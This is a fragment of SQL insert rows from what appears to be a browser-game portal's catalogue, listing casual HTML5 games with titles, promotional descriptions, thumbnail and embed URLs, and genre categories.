(731, 'Parrot And Friends', 'Parrot and Friends is a cute and colorful tetris like game actually played by hundreds of players !\nYou just have to survive as long as possible, having fun making lines and combos.\nTry to reach the next levels an beat other players around the Web !\nWill you reach and survive at Level 10 ?!?', 'https://img.gamedistribution.com/730a3e7aca704b3a8d3899b59e59375d-512x384.jpeg', 'https://html5.gamedistribution.com/730a3e7aca704b3a8d3899b59e59375d/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/730a3e7aca704b3a8d3899b59e59375d-512x340.jpeg', 0, ''),
(732, 'Xtreme Good Guys vs Bad', 'Good Guys vs Bad Boys is a challenging and visceral, bloody FPS game that pits the good guys against the bad guys in an all-out team deathmatch! Pick your team and destroy your opponents using one of nine insanely powerful weapons', 'https://img.gamedistribution.com/a2e47ee9cb3e431fb5c1df874142c9b6-512x384.jpeg', 'https://html5.gamedistribution.com/a2e47ee9cb3e431fb5c1df874142c9b6/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/a2e47ee9cb3e431fb5c1df874142c9b6-1280x550.jpeg', 0, ''),
(733, 'BTS Boat Coloring', 'BTS Boat Coloring Book is fun coloring game suitable for all ages. Choose one of the images and paint it the way you like. When done, print the image and show it to your friends. If you want you can print the image as it is and color it for hand. Have fun playing.', 'https://img.gamedistribution.com/a84fd958cc8648f8aea37977f65d9c6f-512x384.jpeg', 'https://html5.gamedistribution.com/a84fd958cc8648f8aea37977f65d9c6f/', '0', 'Art', 0, 0, '', 0, ''),
(734, 'Wood Block Puzzle', 'Wood Block Puzzle is a classic and addictive puzzle block game! \nBlock Puzzle is a fun puzzle game for all adults and children. It is simple, but difficult to master. \nYou can play this wood style block puzzle to relax and train your brain. More crush wood blocks,more score. ', 'https://img.gamedistribution.com/b044cd30af8c490994f9b6438bf89582-512x384.jpeg', 'https://html5.gamedistribution.com/b044cd30af8c490994f9b6438bf89582/', '0', 'Puzzle', 0, 0, '', 0, ''),
(735, 'Angry Chicken Egg Madness', 'Your quest is to race against the crazy Angry Chicken and become an egg catching ninja!\nCatch as many eggs as you can, avoid the bad stuff and use the super power eggs to your advantage. \nThe ninja egg will let you slice eggs with your finger, so be fast and slice all the eggs before they drop. Can you survive the egg dropping madness of the crazy Angry Chicken?', 'https://img.gamedistribution.com/4e5b648054f94e11983de5bb5e960718-512x384.jpeg', 'https://html5.gamedistribution.com/4e5b648054f94e11983de5bb5e960718/', '0', 'Agility', 0, 0, 'https://img.gamedistribution.com/4e5b648054f94e11983de5bb5e960718-1280x550.jpeg', 0, ''),
(736, 'Horse Family Animal Simulator 3D', 'Your horse is waiting for an unforgettable adventure! Traveling around the island, you will take part in various tasks, you will make a family and baby-foals, win in competitions, make your horse strong and beautiful, decorate your home, protect yourself from forest predators, help other horses and villagers and much more!', 'https://img.gamedistribution.com/ea2d48ab48d647d0ab5223c2f17759dc-512x512.jpeg', 'https://html5.gamedistribution.com/ea2d48ab48d647d0ab5223c2f17759dc/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/ea2d48ab48d647d0ab5223c2f17759dc-1280x720.jpeg', 0, ''),
(737, 'Fabulous Cute Unicorn Coloring Book', 'It’s time to draw, young artists! This time we have to color fabulous cute unicorns. Use the slide bar on the right to select the desired color. The palette of this game contains wonderful pastel shades. Drag the panel with the palette using the left mouse button. Enjoy this new game «Fabulous cute unicorn coloring book»!', 'https://img.gamedistribution.com/114e58319a0a4250b86c7b7a75131d70-512x384.jpeg', 'https://html5.gamedistribution.com/114e58319a0a4250b86c7b7a75131d70/', '0', 'Dress-up', 0, 0, 'https://img.gamedistribution.com/114e58319a0a4250b86c7b7a75131d70-1280x550.jpeg', 0, ''),
(738, 'Racing Jump', 'is a fun physics-based game in which you must compete in a crazy bouncing race! You must control your bouncing character and bounce across the map to try and reach the finish line. \nThis might sound easy, but the physics controls are difficult to master. Furthermore, you must also watch out for bombs and guns that will hinder your progress! Time your jumps carefully and try to collect gold coins as you progress. Can you win the bouncy race?', 'https://img.gamedistribution.com/f333f581b4624ca4976ac22360ba6d54-512x512.jpeg', 'https://html5.gamedistribution.com/f333f581b4624ca4976ac22360ba6d54/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/f333f581b4624ca4976ac22360ba6d54-1280x550.jpeg', 0, ''),
(751, 'Chainsaw Man Anime', 'Chainsaw Man Game is a new amazing chainsaw man anime game,and free online anime game ,in this epic anime action game you can battle through amazing funny levels filled with zombies,demons,bosses and devils, use your chainsaw man attacks to kill and slash like devil hunters and demon slayer,experience the best anime game,perfect for anime fans and action lovers, chainsaw man anime game gives you pure action adventure experience and demon slayer vibes,play as denji and slice zombies,devils and demons in this anime game,master your chainsaw powers to explore multiple stages inspired by the anime show,filled with blood,zombies,and high quality.', 'https://img.gamemonetize.com/o4cf0t4hmkcie0z64vjk5oevjgnlg8gu/512x384.jpg', 'https://html5.gamemonetize.com/o4cf0t4hmkcie0z64vjk5oevjgnlg8gu/', '0', 'Adventure', 0, 0, '', 0, ''),
(752, 'Crazy Kick Ball', 'Dribble the ball past defenders, fake the keeper, and shoot! Dodge tackles, find the gap, and score to beat your high score.There are also many skins to choose from in the game. Come on, football boy.', 'https://img.gamemonetize.com/b31uzigageic19gw6a7ihijn4p1ni0ro/512x384.jpg', 'https://html5.gamemonetize.com/b31uzigageic19gw6a7ihijn4p1ni0ro/', '0', 'Sports', 0, 0, '', 0, ''),
(753, 'Craft Monster Hunting', 'Craft Room: Monster Hunting is a 3D action game where you take on the role of a hero who must hunt the evil monster. The game is set in a vast and beautiful craft world that is filled with danger and adventure. You will need to use your gun and shoot the monster and save everyone in the room. The monster will go around in the familiar rythm Dop Dop Dop Yes Yes with skin of monster.', 'https://img.gamemonetize.com/iy7dyv9scrhh9q05o75em17b3t5rerfb/512x384.jpg', 'https://html5.gamemonetize.com/iy7dyv9scrhh9q05o75em17b3t5rerfb/', '0', 'Shooting', 0, 0, '', 0, ''),
(754, 'Rainbow Survivor', 'Blue Monster Impostor Survivor - where you will play as a person who has been kidnapped during a school trip to an amusement park. You and other players would have to try to run away from the Blue Monster monster and get safe. HOW TO PLAY - Use the joystick to move around and collect boxes - Use the box to hide and protect yourself from the Blue Monster monster - Cooperate with other players to complete the mission in limited time GAME FEATURES - Beautiful 3D and minecraft theme and relaxing sound effect - Fun and addictive gameplay - Great for those who love Minecraft games. Play the game and enjoy it with your loved ones!', 'https://img.gamemonetize.com/2011azu5v0v14r8aq3scgy399izfbr9s/512x384.jpg', 'https://html5.gamemonetize.com/2011azu5v0v14r8aq3scgy399izfbr9s/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(755, 'Ultimate Bottle Flip Game', 'Offline Master Bottle 3D: Tap, Flip &amp;amp; Jump, the ultimate bottle flipping adventure where excitement meets challenge! Master the art of flipping a water bottle and embark on an exhilarating parkour frenzy. Tap to flip, spin, and jump your bottle to achieve your goals. With endless tricks and challenges, this bottle game is sure to keep you hooked! FEATURES - Stunning Graphics: Immerse yourself in visually striking bottle flipping action. - Diverse Challenges: Tackle a wide range of challenges that test your flipping prowess. - Relax and Play: Unwind with easy tap game controls.', 'https://img.gamemonetize.com/ralvylg9mlb81zphmf70vo2f3k0u777w/512x384.jpg', 'https://html5.gamemonetize.com/ralvylg9mlb81zphmf70vo2f3k0u777w/', '0', 'Adventure', 0, 0, '', 0, ''),
(756, 'Repeat Pixel Arts', 'Immerse yourself in the amazing world of pixel art right now! In the game, your task is to repeat pixel drawings. Each level offers images that are unique in color and pixel arrangement, and a diverse palette allows you to make the game more exciting! In the game, your task is to reproduce the pixel pattern depicted on the adjacent canvas. Select the desired color and click on the desired pixel located on the game board to change its color. After you completely repeat the drawing from the neighboring', 'https://img.gamemonetize.com/ztsl034dw3uqai8ro1bdg6b4azrieq8o/512x384.jpg', 'https://html5.gamemonetize.com/ztsl034dw3uqai8ro1bdg6b4azrieq8o/', '0', 'Puzzles', 0, 0, '', 0, ''),
(757, 'Obby Dig to the center of the Earth', 'Grab your drill and start digging straight down! Unlock the way to the depths of the earth by breaking blocks and going deeper and deeper. Overcome the layers of earth and get to the bottom! Each layer gets stronger and requires powerful upgrades to pass through. Hatch pets to earn more and dig faster! Pets give you loot bonuses and speed up your progress. Upgrade your drill, unlock powerful tools and become a better digger! Collect currency, improve your equipment and get stronger and stronger. Compete with other players and climb the leaderboard! Show who is the fastest and hardest digger!', 'https://img.gamemonetize.com/tqe2zu6lsyq77pth6j9qifmtw1k68dun/512x384.jpg', 'https://html5.gamemonetize.com/tqe2zu6lsyq77pth6j9qifmtw1k68dun/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(761, 'Vector Parkour', 'Vector is an exciting arcade-style game featuring you as the exceptional free runner who wont be held down by the system. Run, jump and climb using techniques based on the urban-ninja sport of parkour with Big Brother in hot pursuit!', 'https://img.gamemonetize.com/gcg6mybdrkv0l5midg3b798bx5h30ltk/512x384.jpg', 'https://html5.gamemonetize.com/gcg6mybdrkv0l5midg3b798bx5h30ltk/', '0', 'Fighting', 0, 0, '', 0, 'md'),
(762, 'Bootiful Princess Match', 'Welcome to an exciting puzzle-game, created in a Halloween atmosphere. There are three princesses in the game and each one is ready for her own eerily beautiful transformation. The player will have to look for paired cards to discover new elements of the girls future image. Each successful match brings you closer to creating a unique costume, makeup or hairstyle. Only the most attentive players will be able to make their princesses truly scary-beautiful!', 'https://img.gamemonetize.com/h8m0o4t56kwp34jbp6m3wek0ek0e4spx/512x384.jpg', 'https://html5.gamemonetize.com/h8m0o4t56kwp34jbp6m3wek0ek0e4spx/', '0', 'Puzzles', 0, 0, '', 0, ''),
(763, 'Halloween Tom Math Challenge', 'Halloween Tom Math Challenge is a super fun and completely free math game that lets you test your quick-thinking and basic math skills in a spooky Halloween world! Solve simple math problems and help Tom through thrilling Halloween-themed challenges. Perfect for kids and adults who love brain games with a festive twist &amp;mdash; learn, play, and enjoy the Halloween fun while sharpening your math skills!', 'https://img.gamemonetize.com/uzus656bcagyrurdzhdsc5pfwq8lfwji/512x384.jpg', 'https://html5.gamemonetize.com/uzus656bcagyrurdzhdsc5pfwq8lfwji/', '0', 'Puzzles', 0, 0, '', 0, ''),
(764, 'Maths Quiz with Negative Numbers', 'Sharpen your mind with the challenge of adding and subtracting positive and negative numbers! This fast-paced knockout-style maths quiz is designed for students of Standards 5&amp;ndash;8 to strengthen their understanding of integers and sign rules. You&amp;rsquo;ll face 100 randomly generated questions involving numbers between &amp;minus;100 and +100. Each question must be solved within a 12-second timer &amp;mdash; get one wrong, and the game ends! Keep playing to beat your best score and build longer streaks of correct answers. With its dynamic interface and instant feedback, this game helps learners master tricky negative-number operations through speed and accuracy.', 'https://img.gamemonetize.com/qomy2w6xc1qiu1fr9lq4lt5hd3nwue6l/512x384.jpg', 'https://html5.gamemonetize.com/qomy2w6xc1qiu1fr9lq4lt5hd3nwue6l/', '0', 'Puzzles', 0, 0, '', 0, ''),
(765, 'Sand Blast', 'Ready to blast some blocks? Welcome to Sand Blast, a super addictive puzzle game. It combines classic Tetris strategy with satisfying block blast fun! In this game, your goal is to move, stack, and match different-shaped blocks to create perfect lines or patterns.', 'https://img.gamemonetize.com/ehpcosrryb6e0q9lbqfbp84npyj3eiup/512x384.jpg', 'https://html5.gamemonetize.com/ehpcosrryb6e0q9lbqfbp84npyj3eiup/', '0', 'Puzzles', 0, 0, '', 0, ''),
(766, 'Image Crossword', 'Welcome to Image Crossword, an innovative word puzzle game that transcends traditional boundaries! Here, images dont just sit inside a grid &amp;ndash; they transform into letters, creating a dynamic and unique gameplay experience that combines visual cues with word formation. Innovative Gameplay: Get ready for a twist on classic word games! In Image Crossword, each level presents you with a series of images. Watch in amazement as these images turn into letters, challenging you to decipher and spell out the correct words.', 'https://img.gamemonetize.com/ryhsbpr53d7igq2z2383dcnok3fmw4g2/512x384.jpg', 'https://html5.gamemonetize.com/ryhsbpr53d7igq2z2383dcnok3fmw4g2/', '0', 'Puzzles', 0, 0, '', 0, ''),
(768, 'Corners Classic', 'In our corner version, you can improve your analytical skills and strategic thinking while immersing yourself in an atmosphere of calm and coziness. - Computer Play: Battle a virtual opponent whose difficulty ranges from beginner to master. Upgrade your skills and take on new challenges. - Play with a friend: Have fun playing on the same board with a loved one. See who can handle the pieces better!', 'https://img.gamemonetize.com/18zg842v7hffexi6olfcc1b9aeiumz7w/512x384.jpg', 'https://html5.gamemonetize.com/18zg842v7hffexi6olfcc1b9aeiumz7w/', '0', 'Puzzles', 0, 0, '', 0, ''),
(771, 'Add to Half', 'Sharpen your fraction skills in Add to Half, a fast-paced and brain-teasing math puzzle! In this game, your goal is simple&amp;mdash;but tricky: find two fractions that add up to exactly one-half. Each round presents you with a mix of fraction tiles floating or flipping on the screen. Tap or click the correct pair before time runs out! As you progress, the fractions get more challenging &amp;mdash; from simple ones like &amp;frac14; and &amp;frac14; to trickier combinations like and &amp;sup1;&amp;frasl;. Speed, accuracy, and quick thinking are your keys to climbing the leaderboard.', 'https://img.gamemonetize.com/5lfr5zmdckpfztyulsov3govcm25y3o1/512x384.jpg', 'https://html5.gamemonetize.com/5lfr5zmdckpfztyulsov3govcm25y3o1/', '0', 'Puzzles', 0, 0, '', 0, ''),
(772, 'Plamber Differences', 'Plumber Differences is a super fun and engaging spot-the-differences game inspired by the classic Mario-style theme! Sharpen your eyes and test your observation skills as you explore colorful plumber-themed scenes filled with hidden details and tricky differences to uncover. Each level offers a fresh challenge with vibrant graphics, cheerful music, and nostalgic elements that bring the plumber world to life. Perfect for players of all ages, this game combines the charm of retro platformers with the fun of puzzle-solving. Can you find all the differences before time runs out? Jump in and start spotting!', 'https://img.gamemonetize.com/bjy8uk4u6dkhd0ad3m927zjfb9af1lz4/512x384.jpg', 'https://html5.gamemonetize.com/bjy8uk4u6dkhd0ad3m927zjfb9af1lz4/', '0', 'Puzzles', 0, 0, '', 0, ''),
(775, 'Wood Block Puzzle', '<p>wood puzzle game&nbsp;</p>', 'https://www.craazygames.net/a/wood.webp', 'https://cdn.htmlgames.com/WoodBlockPuzzle/', 'Yes', 'Puzzle', 0, 0, '', 0, ''),
(776, 'Noob vs Pro But Floor is Lava Minecraft', 'Noob and Pro decided to relax, but suddenly rising lava ruined their plans! Now they&amp;rsquo;re trying to survive in this lava-filled world! A fun two-player game in a Minecraft style. The game features: -Two-player mode -Single-player mode -12 main levels plus 2 special levels -Hot lava -Jump and speed potions found in chests -Falling sand blocks -Levels with lava lakes -And much more! The main goal is to avoid falling into the lava, which rises higher and higher each round. Occasionally, the lava will lower to give you a brief break. 1 Player mode also available!', 'https://img.gamemonetize.com/7j6xjz5mtmf5j97yyadzc7bnykholqsr/512x384.jpg', 'https://html5.gamemonetize.com/7j6xjz5mtmf5j97yyadzc7bnykholqsr/', '0', 'Arcade', 0, 0, '', 0, ''),
(779, 'Crazy Jelly Shift', 'Shift the shape of Jelly to avoid hitting obstacles. Reach the highest level possible!', 'https://img.gamedistribution.com/d5a319e98669488bbf7bba18d7aac83c-512x384.jpeg', 'https://html5.gamedistribution.com/d5a319e98669488bbf7bba18d7aac83c/', '0', 'Casual', 0, 0, '', 0, ''),
(780, 'Cube Gravity Switch', 'Gravity Switch is an addictive game that requires focus, concentration and precise timing.', 'https://img.gamedistribution.com/7790b0d476c14b0cafa31888ef6a910a-512x384.jpeg', 'https://html5.gamedistribution.com/7790b0d476c14b0cafa31888ef6a910a/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/7790b0d476c14b0cafa31888ef6a910a-1280x550.jpeg', 0, ''),
(781, 'Color Bars', 'Try Color Bars by go to color ball to fit on br with color.Enjoy !', 'https://img.gamedistribution.com/a7b113945b4f48c6b663bd6272396732-512x512.jpeg', 'https://html5.gamedistribution.com/a7b113945b4f48c6b663bd6272396732/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/a7b113945b4f48c6b663bd6272396732-1280x720.jpeg', 0, ''),
(782, 'Fire Storm', 'The fight has begun. Only a few elite fighters went to the streets. Are you one of them? Almost no one gets out of the gouse. Gangs dominated the city and the only way to save humanity is to get rid of them. The game has several levels, and in each you will have to accomplish your goal without dying. Shoot 100 enemies, destroy their cars. Instructions: WASD - move. LKM - shoot. RKM - grenade. Space - jump. Shift - time slow', 'https://img.gamedistribution.com/e00bd10dcf0c421d8555b25bc818a495-512x384.jpeg', 'https://html5.gamedistribution.com/e00bd10dcf0c421d8555b25bc818a495/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(783, 'Piggy Bank Adventure2', 'Piggy Bank Adventure2 is fun addictive puzzle game. It\'s time to save some money! Collect all the stars and Take the coins to the Piggy Bank cutting the ropes!. ', 'https://img.gamedistribution.com/ed9a69999a474906bf8397192ab79711-512x384.jpeg', 'https://html5.gamedistribution.com/ed9a69999a474906bf8397192ab79711/', '0', 'Adventure', 0, 0, '', 0, ''),
(784, 'Portal Box', 'Portal Box is  a 3D puzzle-platformer game that player controls a green box in the game with keyboard arrow keys. After green box started to move, it will not stop until it reaches to the end of the platform or a block. Main goal of the green box is reach to green tile in the platform. With some mechanics on the platform, player should put green box on green tile. All levels in the game has a unique pass codes that you can use to pass directly to the level later.', 'https://img.gamedistribution.com/0463aa5358664561ba6d058c3d1cba0b-512x384.jpeg', 'https://html5.gamedistribution.com/0463aa5358664561ba6d058c3d1cba0b/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/0463aa5358664561ba6d058c3d1cba0b-1280x550.jpeg', 0, ''),
(785, 'Kids Animal Fun', 'The jigsaw pictures of cute animals in various situations are ready again! Let your children play and develop their cognitive skills, fine motor skills, patience and their ability to focus. And one more thing...  you don\'t have to tide up!\n', 'https://img.gamedistribution.com/3e51d13d3a134386bd90e269b05bc54b-512x340.jpeg', 'https://html5.gamedistribution.com/3e51d13d3a134386bd90e269b05bc54b/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/3e51d13d3a134386bd90e269b05bc54b-1280x550.jpeg', 0, ''),
(786, 'Color Fill', 'Color Fill is fun addictive puzzle game.You must attempt to fill all the empty block with color. You must plan your moves carefully and think about how you fill the blocks.', 'https://img.gamedistribution.com/f1087cde54d54bbe85baf21d2f5ca6d8-512x384.jpeg', 'https://html5.gamedistribution.com/f1087cde54d54bbe85baf21d2f5ca6d8/', '0', 'Casual', 0, 0, '', 0, ''),
(787, 'Park The Taxi', 'Drive a taxi and park it into marked parking spots. Drive fast to get three stars but avoid hitting other vehicles or driving off the street.', 'https://img.gamedistribution.com/3ea50532686641f3a547256f5a9f1124-512x384.jpeg', 'https://html5.gamedistribution.com/3ea50532686641f3a547256f5a9f1124/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/3ea50532686641f3a547256f5a9f1124-1280x550.jpeg', 0, ''),
(788, 'xDrive iPerformance Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: xDrive iPerformance Puzzle. All images is with the xdrive iperformance. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/87a419e8ddf24ba4829824442b408220-512x384.jpeg', 'https://html5.gamedistribution.com/87a419e8ddf24ba4829824442b408220/', '0', 'Puzzle', 0, 0, '', 0, ''),
(789, 'Bricks', 'Break all the bricks to move on to the next phase.', 'https://img.gamedistribution.com/c8ae1cadd764423fada1f52e87515bcd-512x384.jpeg', 'https://html5.gamedistribution.com/c8ae1cadd764423fada1f52e87515bcd/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/c8ae1cadd764423fada1f52e87515bcd-1280x550.jpeg', 0, ''),
(790, 'Hardest Game On Earth', 'Navigate your way through the maze\nLong Description\nThe title says it all! This is the world\'s hardest game.\n\nNavigate your way through the maze.\n\nCollect coins, keys and avoid obstacles. Don\'t break your glass!\n\nFeatures:\n\n- Tutorial included. \n- Fun earth theme\n- Extremely challenging levels. Be mentally and emotionally prepared!', 'https://img.gamedistribution.com/1e2400b542644c108c3b394739250ff0-1280x550.jpeg', 'https://html5.gamedistribution.com/1e2400b542644c108c3b394739250ff0/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/1e2400b542644c108c3b394739250ff0-512x384.jpeg', 0, ''),
(791, 'Space Roll', 'Space Roll is an addictive and stunning game Can you roll the space ball safely on a galaxy or neon platform as long as possible Collect gems to buy new colorful balls and avoid obstacles and gaps Have fun\n', 'https://img.gamedistribution.com/4bc9a2dc825b42c887178da94a69b193-512x384.jpeg', 'https://html5.gamedistribution.com/4bc9a2dc825b42c887178da94a69b193/', '0', 'Agility', 0, 0, '', 0, ''),
(792, 'Agent Shooting', 'Agents are tasked with uncovering large dark forces, providing you with a large number of weapons to use, such as pistols, shotguns, sniper rifles, bazookas, aircraft, tanks, and vehicles', 'https://img.gamedistribution.com/4cca1516f30c476b8b0295a743b90934-512x384.jpeg', 'https://html5.gamedistribution.com/4cca1516f30c476b8b0295a743b90934/', '0', 'Shooter', 0, 0, '', 0, ''),
(793, 'Snow Drift', 'Every novice driver always tries to follow all the rules of the road and saves the car, but as soon as the experience and knowledge increase, as well as the level of professionalism, the driver decides that he can afford more, that is, he is not afraid to increase the speed to the limit, he is not afraid to brake sharply and turn sharply. ', 'https://img.gamedistribution.com/1329083984b046b2b736039025c573f7-512x384.jpeg', 'https://html5.gamedistribution.com/1329083984b046b2b736039025c573f7/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(794, 'School Match 3', 'School Match 3 – this cool game three in a row, in which you have to put the blocks of the same color in a series of three pieces or more to achieve the highest possible score, be careful to account the scale to the left did not fall too low, otherwise the game will be over. The game is done to a beautiful summer style! Enjoy the game!', 'https://img.gamedistribution.com/b5930a5635494146b309dae6a65020b2-512x384.jpeg', 'https://html5.gamedistribution.com/b5930a5635494146b309dae6a65020b2/', '0', 'Match-3', 0, 0, 'https://img.gamedistribution.com/b5930a5635494146b309dae6a65020b2-1280x720.jpeg', 0, ''),
(795, 'Industry Road Construction', 'Put your road construction skills and build roads on various city locations. Become engineer of the construction site and crash all the road to develop a new road by following some constructions. Drive multiple heavy machinery on construction zone to construct roads. Use your architecture knowledge and create construction-plan; how to build road on city area and which type of machinery will be used in road builder.', 'https://img.gamedistribution.com/61c8004ac2c54dbe836437dc6b9f6d12-512x384.jpeg', 'https://html5.gamedistribution.com/61c8004ac2c54dbe836437dc6b9f6d12/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/61c8004ac2c54dbe836437dc6b9f6d12-1280x550.jpeg', 0, ''),
(796, 'Fast Car Traffic', 'Fast Car Traffic features:\n- multiple game modes\n- multiple levels', 'https://img.gamedistribution.com/88bd042c32724099ae7b5d47ee5fd142-1280x550.jpeg', 'https://html5.gamedistribution.com/88bd042c32724099ae7b5d47ee5fd142/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/88bd042c32724099ae7b5d47ee5fd142-512x384.jpeg', 0, ''),
(797, 'Cargo Truck Simulator', 'Cargo Truck Simulator features:\n- multiple levels\n- good graphics', 'https://img.gamedistribution.com/d18a07747fad49c1a5d2f69a7e3dde17-1280x550.jpeg', 'https://html5.gamedistribution.com/d18a07747fad49c1a5d2f69a7e3dde17/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/d18a07747fad49c1a5d2f69a7e3dde17-512x384.jpeg', 0, ''),
(798, 'Motorbikes Jigsaw Challenge', 'Motorbikes Jigsaw Challenge is a free online game from genre of puzzle and jigsaw games. You can select one of the 12 unlocked images and then select one of the three modes: easy, medium and hard. Have fun and enjoy!', 'https://img.gamedistribution.com/79b687a73d414347b80a3d2ac2c7a7ff-512x512.jpeg', 'https://html5.gamedistribution.com/79b687a73d414347b80a3d2ac2c7a7ff/', '0', 'Jigsaw', 0, 0, '', 0, ''),
(799, 'Jelly Shift2', 'Jelly Shift2 is fun addictive casual game. Change the jelly shape according to space .Use up and down arrow key to change the shape of the jelly .', 'https://img.gamedistribution.com/e46f8c0bbd884e72a7f87a726e79f213-512x384.jpeg', 'https://html5.gamedistribution.com/e46f8c0bbd884e72a7f87a726e79f213/', '0', 'Casual', 0, 0, '', 0, ''),
(800, 'Mafia Driver Vice City Crime', 'Step in the shoes of a real gangster and take over the big italian city in this amazing mafia game.\nYou just came back out of jail and it’s time to retake your position in Mafia Driver Vice Crime City! \nStart from the bottom and work your way up mobster and it won’t be easy in our mafia driving simulator.', 'https://img.gamedistribution.com/2a61c0f4d04d46a49ead48f07346943f-512x384.jpeg', 'https://html5.gamedistribution.com/2a61c0f4d04d46a49ead48f07346943f/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(801, 'Bird Spikes', 'Bird Spikes is fun addictive casual game.Collect toffee as much as you can but beware of spikes .', 'https://img.gamedistribution.com/67fcbfc2bff249f3a0e52d4af62e3bf6-512x512.jpeg', 'https://html5.gamedistribution.com/67fcbfc2bff249f3a0e52d4af62e3bf6/', '0', 'Casual', 0, 0, '', 0, ''),
(802, 'Advanced Tournament Archery', 'Super realistic graphic and archery shooting experience \nArchery Tournament completely simulates this ancient to modern sports from every aspect: 3D graphic, wind effects, draw strength, arrow and the target', 'https://img.gamedistribution.com/b60e17adb8054b069ba6628cf7ad8b79-512x384.jpeg', 'https://html5.gamedistribution.com/b60e17adb8054b069ba6628cf7ad8b79/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/b60e17adb8054b069ba6628cf7ad8b79-1280x550.jpeg', 0, ''),
(803, 'Animal Trivia', 'Test your knowledge of animals and wild life.\n\nHow many questions can you answer correctly?\n\nFeatures:\n\n- Beautiful graphics\n- Additional layer of educational information, upon answering the questions.\n- Easy to configure Animal Trivia Quiz. Let us know what you need, and we\'ll customize it for you.\n- Question separated into different difficulty levels (easy questions first, followed by more challenging questions)\n- 20 randomly rotated questions per round\n- Fullscreen mode', 'https://img.gamedistribution.com/d963b922ee68446ca36037c36d76ffe8-1280x550.jpeg', 'https://html5.gamedistribution.com/d963b922ee68446ca36037c36d76ffe8/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/d963b922ee68446ca36037c36d76ffe8-512x384.jpeg', 0, ''),
(804, 'Cowboy Run', 'Super Cowboy Run, is a fascinating and beautiful game in which you must collect coins, lives, ammunition and kill monsters, and go as far as possible!', 'https://img.gamedistribution.com/3fcbf5761c8343c9be01cdf33ba6a3ba-512x384.jpeg', 'https://html5.gamedistribution.com/3fcbf5761c8343c9be01cdf33ba6a3ba/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/3fcbf5761c8343c9be01cdf33ba6a3ba-1280x550.jpeg', 0, ''),
(805, 'Speed For Beat', 'Speed For Beat is fun addicting racing game.Having different mode with different tournaments.If you love the car racing game this game is perfect for you.', 'https://img.gamedistribution.com/d14883b666364195aceebcfb9a0f996b-512x512.jpeg', 'https://html5.gamedistribution.com/d14883b666364195aceebcfb9a0f996b/', '0', 'Casual', 0, 0, '', 0, ''),
(806, 'Classical Rabbit Sniper Hunting 2019', 'Rabbit growth is out of control and you need to control population by hunting them with your sniper rifle. Aim your rifle at target and take precision shots for clean kills. Do not kill other animals. Good Luck', 'https://img.gamedistribution.com/d28ceeb5b37b4a1289ddcb266a562c88-512x512.jpeg', 'https://html5.gamedistribution.com/d28ceeb5b37b4a1289ddcb266a562c88/', '0', 'Battle', 0, 0, '', 0, ''),
(808, 'Rogue Runner', 'Become the most wanted fugitive in a relentless, high-octane Rogue Runner simulator. Outsmart and outdrive an ever-growing police force in a dynamic open world. Your driving skills are the only thing between freedom and capture. Weave through dense urban traffic, execute dangerous maneuvers, and use the environment to your advantage. Every smashed barrier and near-miss intensifies the pursuit. Feel the adrenaline surge as SWAT teams join the hunt, deploying spike strips and tactical units. How long can you survive with the entire citys law enforcement on your tail? Push your vehicle to its limits, master the streets, and defy capture in', 'https://img.gamemonetize.com/0ofsn4w5u0lzffnmb1ed7d8ra7uj3wpv/512x384.jpg', 'https://html5.gamemonetize.com/0ofsn4w5u0lzffnmb1ed7d8ra7uj3wpv/', '0', 'Action', 0, 0, '', 0, ''),
(809, 'Monster Escape Logic Puzzle Adventure', 'Monster Escape is a thrilling logic puzzle game where every move counts! Rotate the world, dodge deadly traps, and guide your monster to the key in order to escape the dungeon. With 60 challenging levels, brain-teasing mechanics, and fast reflex gameplay, this adventure will test your strategy skills and puzzle-solving abilities. Avoid falling boxes, sharp thorns, and tricky obstacles as you explore mysterious dungeon worlds. Each level becomes harder, pushing you to think smarter, move quicker, and master the physics-based rotation system. Perfect for fans of escape games, monster adventure games, brain puzzles, and skill-based platformers.', 'https://img.gamemonetize.com/iswcg23g2usoz6y1uj4kjb92um44r24i/512x384.jpg', 'https://html5.gamemonetize.com/iswcg23g2usoz6y1uj4kjb92um44r24i/', '0', 'Puzzles', 0, 0, '', 0, ''),
(816, 'Space War Symphony', 'Space War Symphony is a fast, rhythm-tuned arcade shooter where your starship dances with the beat. Glide horizontally with the mouse, click to fire, and time shots to the BPM for boosted damage, score, and stylish spread patterns. Web Dev &lt;a href=\'https://www.unblockedgamest.com/.\'&gt;https://www.unblockedgamest.com/.&lt;/a&gt; Enemies surge in waves, evolving as your score climbs, while bosses crash the stage with distinct bullet patterns and glowing health bars.', 'https://img.gamemonetize.com/game0fm682vwc1pxjlyic9f3o6jz883u/512x384.jpg', 'https://html5.gamemonetize.com/game0fm682vwc1pxjlyic9f3o6jz883u/', '0', 'Shooting', 0, 0, '', 0, ''),
(817, 'Pixel Runner', 'Pixel Runner is fun addictive hyper casual runner game .Click the move to connect the blocks with the road.', 'https://img.gamedistribution.com/1e8dd736a1ee4e4eb05f006a7f8fa0df-512x384.jpeg', 'https://html5.gamedistribution.com/1e8dd736a1ee4e4eb05f006a7f8fa0df/', '0', 'Agility', 0, 0, '', 0, ''),
